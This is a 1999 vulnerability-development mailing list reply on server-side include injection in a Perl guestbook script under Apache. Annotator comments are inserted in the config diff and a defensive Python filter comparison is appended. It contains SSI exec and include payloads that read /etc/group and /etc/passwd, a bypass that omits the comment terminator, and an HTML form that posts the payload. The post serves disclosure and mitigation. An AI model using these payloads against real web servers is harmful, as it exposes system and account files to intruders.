Vulnerability Development mailing list archives

Re: Guestbook perl script (error fix)


From: BlueBoar () THIEVCO COM (Blue Boar)
Date: Mon, 4 Oct 1999 19:09:16 -0700


drch wrote:

> what if $FORM{'url'} == <!--#include file="/etc/passwd" -->


I finally got around to playing with this today.

The short answer is, it worked perfectly.

The long answer is a little more disturbing.  I believe I've spotted a
deficiency in Apache.

I installed the latest version of Apache (1.3.9 when I grabbed it) from
source on my Sparc/Solaris 2.5.1 machine using GCC 2.8.1.  The only change
I can recall making was to correct the server name, and to add SSI:

# diff httpd.conf httpd.conf.default
274c274
< ServerName XXXXXXXX

---
#ServerName XXXXXXXX
315c315
<     Options Indexes FollowSymLinks Includes

---
    Options Indexes FollowSymLinks
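Review bot: the 315c315 hunk is the one that actually turns on SSI processing, by adding `Includes` to the directory's `Options`; the `<!--#exec cmd=...>` tests described in the message depend on this option being present, so anyone checking whether a hosted script is exposed should confirm this setting first, together with the handler lines in the next hunk.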
680,681c680,681
< AddType text/html .shtml
< AddHandler server-parsed .shtml

---
#AddType text/html .shtml
#AddHandler server-parsed .shtml
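Review bot: the 680,681c680,681 hunk binds the server-parsed handler to `.shtml` only, so under this configuration the guestbook.html the script writes would not be parsed; as the message notes further down, the reproduction relied on renaming the output to guestbook.shtml, and a real exposure needs the host to also route `.html` through the handler.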

I had to modify the guestbook script for the appropriate directories and
filenames, but it's otherwise the same one we've been discussing.  HTML
enabled.

During my testing of the exploit, I've found that all of these work:

<!--#exec cmd="cat /etc/group"-->
<!--#exec cmd="cat /etc/group">
<!--#exec cmd="cat /etc/group"

This works even in the middle of a line of HTML code!

What am I missing?  Clearly, the author of the guestbook.pl script expected
SSI lines to end in --> :

   $value =~ s/<!--(.|\n)*-->//g;

It turns out that one can get around this much more easily than previously
stated.  Just leave off the -->.

I don't know a lot about SSI.  Can someone help me with that?  This seems a
little TOO flexible for safety's sake.

Can anyone else verify that their web server behaves similarly, and that I
haven't configured or compiled something funny?  I haven't had time to dig
into the Apache code yet.

I suggest that folks look for lines that have <!-- in them, and dump the
whole line for safety's sake, when writing such scripts.  In my brief
testing, the entire <!-- prefix seemed necessary.

For completeness' sake, I should state that, at least for the script as
written, SSI must be enabled for .html files, as the guestbook.html is that
type.  In my example, I went out of my way to make it guestbook.shtml,
which I would not expect to find "in the wild."  And yes, my web host DOES
have some of the virtual domains set up that way.  I gave them a little
advance notice for purposes of CYA. :)  I won't tell which ones.  I did my
testing on my own machine, not on my web hosting provider.

                                                        BB

P.S. For those who want to see a piece of the work in progress that led to
this, here's a short bit of HTML I was using as an "exploit" of sorts.

<body>
<form method=POST action="http://www.example.com/cgi-bin/guestbook.pl">
Your Name:
<input type=text name="realname" size=41 value="a">
URL:
<input type=text name="url" size=80 value='<!--#exec cmd="cat /etc/group'>
Comments:
<input type=text name="comments" VALUE="a">
<input type=submit VALUE=Send> <input type=reset>
</form>
</body>
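As an added illustration (not code from the original post or from guestbook.pl), the script's regex is transliterated from Perl to Python and placed beside the line-dropping check suggested above; the sample field values are constructed from the directive forms quoted in the message, and `escape_markup` assumes the field does not need raw HTML.

```python
import re
import html

# Constructed sample guestbook field values, modelled on the SSI strings
# quoted in the message above (not data taken from the original post).
SAMPLES = [
    '<!--#exec cmd="cat /etc/group"-->',               # properly closed directive
    '<!--#exec cmd="cat /etc/group">',                 # closed with ">" only
    '<!--#exec cmd="cat /etc/group"',                  # no terminator at all
    'see <!--#exec cmd="cat /etc/group" mid-line',     # directive inside other text
    'http://example.com/ plain value',                 # benign value
]

# The guestbook.pl check quoted in the message, transliterated to Python:
#   $value =~ s/<!--(.|\n)*-->//g;
# It only removes spans that are explicitly closed with "-->", so a directive
# that omits the terminator passes through untouched.
def weak_filter(value: str) -> str:
    return re.sub(r'<!--(.|\n)*-->', '', value)

# The message's suggestion: drop every line that contains the "<!--" prefix,
# since the prefix alone is enough for the server-parsed handler to act on it.
def drop_ssi_lines(value: str) -> str:
    kept = [line for line in value.splitlines() if '<!--' not in line]
    return '\n'.join(kept)

# Alternative for fields that never need markup (assumption): escape it, so
# "<!--" cannot reach the server-parsed file as a tag at all.
def escape_markup(value: str) -> str:
    return html.escape(value, quote=True)

def still_contains_ssi_prefix(value: str) -> bool:
    return '<!--' in value

if __name__ == '__main__':
    for s in SAMPLES:
        print(repr(s))
        print('  weak   ->', repr(weak_filter(s)),
              '| prefix left:', still_contains_ssi_prefix(weak_filter(s)))
        print('  drop   ->', repr(drop_ssi_lines(s)))
        print('  escape ->', repr(escape_markup(s)))
```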



